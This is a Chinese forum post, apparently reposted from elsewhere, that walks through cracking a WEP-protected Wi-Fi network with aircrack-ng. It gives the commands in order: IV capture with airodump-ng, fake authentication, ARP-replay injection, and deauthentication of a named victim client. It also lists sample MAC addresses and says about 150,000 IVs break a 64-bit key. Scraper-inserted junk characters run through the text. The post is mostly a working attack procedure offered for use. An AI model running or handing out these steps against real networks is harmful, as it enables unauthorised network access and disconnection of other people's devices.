上等兵
- 注册时间
- 2009-2-9
- 金币
- 30 个
- 威望
- 0 个
- 荣誉
- 0 个
累计签到:1 天 连续签到:0 天 [LV.20]漫游旅程
|
这是自己从网上找到的,回去测试一下了,回来给大家报告……. P% k+ X) t( J9 P' v( G
+ F( h4 y4 f4 l: r9 A" V
测试环境:4 A8 K' W! \/ m8 ~& t
D-LINK DL-624+A,TP-LINK TL-WN310G,Dell LATITUDE D510,BackTrack 1.0/ n2 G' w9 ?. _5 C3 @: |
AP的MAC 00:14:E3:EA:72:92( c+ f3 _* J1 [0 C' j: B! C
攻击者的MAC 00:15:E4:13:9A:98) ^9 I0 Z- g% Q
受害者的MAC 00:15:E3:EA:82:621 Z# @" z* i% E0 B% r
一个Aircrack-ng可以完成所有工作
# m3 U5 o; c! @5 W- `+ h- v
# t% }% b$ q b' o% N1.# airodump-ng -w x ath0
" z |# y: M) K9 k; S. I可以看到当前所有探测到的AP以及客户端) H1 ^! u1 C# k2 @
* z5 ] Q. A( ]8 x
2.# airodump-ng -c 10 –ivs -w x ath09 ]6 Q. w) {9 a( l$ @9 e: K
选择特定channel
$ d- J* c: e( ]/ V7 t2 Y8 y选择值记录ivs包
, x. U l3 f- ?6 J. U
K$ z1 E# I+ @( r9 _! r3.# airreplay-ng –fakeauth 0 -e “default” -a 00:14:E3:EA:72:92 -h 00:15:E4:13:9A:98 ath0
4 H, c5 g. C) Q- U8 R: [ # airreplay-ng –fakeauth 0 -e “ESSID” -a BSSID -h LocalMAC WLANInterface
' w \* h7 _+ ~ 显示successful证明网卡支持Inject( }3 k/ M4 E2 A1 e: |$ P
0 w# z6 I- g. i- Q. o4.# airreplay-ng –arpreplay -b 00:14:E3:EA:72:92 -h 00:15:E3:EA:82:62 ath0. Y) c0 c+ Q, s! I9 ~
# airreplay-ng –arpreplay -r xxxxx.cap -b 00:14:E3:EA:72:92 -h 00:15:E3:EA:82:62 ath0
7 t1 U' t& c# k # airreplay-ng Attackmode -b BSSID -h VictimMAC WLANInterface, q* Q+ b7 ?0 I9 b( s( i/ a; \1 X
( a: }$ s+ a ~' K
VictimMAC可以从airodump-ng里获得,必须是那些已经ASSCO协商成功的客户端
2 l, X8 D5 `" B% u( B( o* c一旦airreplay-ng抓到ARP包,就会开始伪造发送,加快airodump-ng的抓包过程
" X) X3 k( Y$ k7 ^3 C* n# W但是已经连接好的客户端一般不会频繁的发送ARP包,所以需要–deauth攻击来触发
0 I$ ^& \! g) L: n) @5 t7 c# _( L5 Q! C( b, Q
5.# airreplay-ng –deauth 5 -a 00:14:E3:EA:72:92 -c 00:15:E3:EA:82:62 ath0
/ I; T5 Y5 O# u2 D% u # airreplay-ng Attackmode -a BSSID -c VictimMAC WLANInterface
4 R7 k, r+ S/ H) T6 e9 [. Z, Y( U0 I* b# c: t) _
触发Victim重新跟AP进行ARP解析; A, M0 A: Y3 _1 X, f7 o
可能需要多次才能正确捕获到包, ]6 i( a; f0 |0 P7 d$ l
7 D$ Y5 _0 o$ e# g e; y7 o4 X6.一般64 bit的密钥150000左右个IVS就可以破解了% c+ C" y1 w5 ]. Q& U" ^
当然,IVS获得个数越多越好 |
|